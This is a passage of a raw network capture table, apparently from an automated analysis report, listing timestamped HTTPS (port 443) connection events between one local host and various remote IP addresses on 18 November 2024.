                                                                                                                                                                                            Nov 18, 2024 21:00:10.355815887 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.355938911 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.355989933 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356009007 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356024981 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356071949 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356117964 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356131077 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356153965 CET49816443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356182098 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356239080 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356314898 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356331110 CET44349816142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356359959 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356365919 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356379032 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356432915 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356437922 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356451035 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.356492996 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.357177973 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.357281923 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.357331991 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.357604027 CET49819443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.357858896 CET49816443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:10.357867002 CET44349816142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.363360882 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.368917942 CET49802443192.168.2.16146.75.120.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.368943930 CET44349802146.75.120.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.381875038 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.381886959 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.381911039 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.381923914 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.381936073 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.381943941 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.382003069 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.383897066 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.384414911 CET49820443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.384454012 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.384807110 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.385135889 CET49820443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.385220051 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.385303974 CET49820443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.392721891 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:10.392767906 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.392909050 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:10.393120050 CET49835443192.168.2.1694.141.120.12
                                                                                                                                                                                            Nov 18, 2024 21:00:10.393146038 CET4434983594.141.120.12192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.399360895 CET4434981966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.411385059 CET49816443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:10.426218033 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.426230907 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.426290035 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.426316023 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.426328897 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.426353931 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.426374912 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.426412106 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.427356005 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.443671942 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.443916082 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.443942070 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.444941044 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.445014000 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.445358038 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.445416927 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.445523024 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.445529938 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.468293905 CET44349813157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.468369961 CET44349813157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.468466997 CET49813443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.468924999 CET49813443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.468941927 CET44349813157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.468952894 CET49813443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.468988895 CET49813443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.479466915 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.479494095 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.479747057 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.479831934 CET49836443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.479844093 CET44349836157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.491398096 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.495647907 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.495671988 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.495826960 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.495826960 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.495857954 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.496036053 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.511368036 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.511605024 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.511667013 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.512180090 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.512531042 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.512649059 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.512665987 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.513642073 CET44349826162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.513917923 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:10.513941050 CET44349826162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.515525103 CET44349826162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.515611887 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:10.515902996 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:10.515969992 CET44349826162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.516021967 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:10.516028881 CET44349826162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.525087118 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.525108099 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.525276899 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.525278091 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.525307894 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.525368929 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.530673981 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.530733109 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.540921926 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.541126966 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.541155100 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.542634010 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.542711020 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.543013096 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.543091059 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.543193102 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.543200970 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.545139074 CET4434981966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.545186043 CET4434981966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.545303106 CET49819443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.545327902 CET4434981966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.545389891 CET4434981966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.545448065 CET49819443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.545816898 CET49819443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.545839071 CET4434981966.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.546149969 CET49837443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.546184063 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.546248913 CET49837443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.546669006 CET49837443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.546680927 CET4434983766.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.554393053 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.554420948 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.556149006 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:10.561886072 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.561939001 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.561969042 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.561981916 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.561999083 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.562252998 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.562299967 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.562479019 CET44349805157.240.0.6192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.562536955 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.562553883 CET49805443192.168.2.16157.240.0.6
                                                                                                                                                                                            Nov 18, 2024 21:00:10.564379930 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.564603090 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.564624071 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.565763950 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.566055059 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.566165924 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.566170931 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.566210985 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.585355997 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.594150066 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.594173908 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.594223976 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.594245911 CET49820443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.594296932 CET49820443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.594743013 CET49820443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.594779968 CET4434982066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.595082998 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.595130920 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.595206976 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.595494986 CET49838443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.595525026 CET4434983866.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.615381956 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.629581928 CET44349814157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.629635096 CET44349814157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.629715919 CET44349814157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.629780054 CET49814443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.629841089 CET44349814157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.630055904 CET49814443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.630976915 CET49814443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.631036997 CET44349814157.240.0.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.631098032 CET49814443192.168.2.16157.240.0.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.640158892 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.640202045 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.640304089 CET44349816142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.640387058 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.640623093 CET49839443192.168.2.16157.240.253.35
                                                                                                                                                                                            Nov 18, 2024 21:00:10.640642881 CET44349839157.240.253.35192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.642640114 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.642658949 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.642672062 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.642724991 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.642755032 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.664350986 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                                            Nov 18, 2024 21:00:10.684792995 CET44349825173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.685025930 CET49825443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.685055017 CET44349825173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.685420036 CET44349825173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.685789108 CET49825443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.685874939 CET44349825173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.685992956 CET49825443192.168.2.16173.194.76.157
                                                                                                                                                                                            Nov 18, 2024 21:00:10.695391893 CET49816443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:10.695451021 CET44349816142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.695494890 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.696433067 CET49816443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:10.696532965 CET44349816142.250.185.130192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.696603060 CET49816443192.168.2.16142.250.185.130
                                                                                                                                                                                            Nov 18, 2024 21:00:10.707545042 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.707609892 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.707631111 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.707684040 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.707755089 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.707792044 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.710699081 CET44349826162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.710869074 CET44349826162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.710933924 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:10.711148977 CET49826443192.168.2.16162.159.140.229
                                                                                                                                                                                            Nov 18, 2024 21:00:10.711175919 CET44349826162.159.140.229192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.731332064 CET44349825173.194.76.157192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.732383013 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.732489109 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.732551098 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.732583046 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.732631922 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.732701063 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.733828068 CET49823443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.733844995 CET4434982366.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.737499952 CET44349829104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.737709999 CET49829443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:10.737730026 CET44349829104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.739164114 CET44349829104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.739228964 CET49829443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:10.739573002 CET49829443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:10.739655972 CET44349829104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.740025043 CET49829443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:10.740031958 CET44349829104.244.42.67192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.747955084 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.747966051 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.748008013 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.748049021 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.748075962 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.758383989 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.762949944 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.762959003 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.763022900 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.763035059 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.763046980 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.763099909 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.763256073 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.763273954 CET4434982166.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.763283968 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.763324976 CET49821443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.780309916 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.780375004 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.780396938 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.780451059 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.780459881 CET4434982466.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.780507088 CET49824443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.790380001 CET49829443192.168.2.16104.244.42.67
                                                                                                                                                                                            Nov 18, 2024 21:00:10.800932884 CET44349827142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.801211119 CET49827443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:10.801227093 CET44349827142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.802664995 CET44349827142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.802750111 CET49827443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:10.803128958 CET49827443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:10.803199053 CET44349827142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.803324938 CET49827443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:10.803333998 CET44349827142.250.186.132192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.810168028 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.810193062 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.810210943 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.810254097 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.810291052 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.812366009 CET4434983066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.812608957 CET49830443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.812629938 CET4434983066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.813299894 CET4434983066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.813642979 CET49830443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.813729048 CET4434983066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.813783884 CET49830443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.826961040 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.826971054 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.827033997 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.827860117 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.827871084 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.827930927 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.829375029 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.829385042 CET4434982266.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.829448938 CET49822443192.168.2.1666.33.207.42
                                                                                                                                                                                            Nov 18, 2024 21:00:10.854394913 CET49827443192.168.2.16142.250.186.132
                                                                                                                                                                                            Nov 18, 2024 21:00:10.859328032 CET4434983066.33.207.42192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.874778986 CET44349834151.101.65.140192.168.2.16
                                                                                                                                                                                            Nov 18, 2024 21:00:10.876768112 CET49834443192.168.2.16151.101.65.140
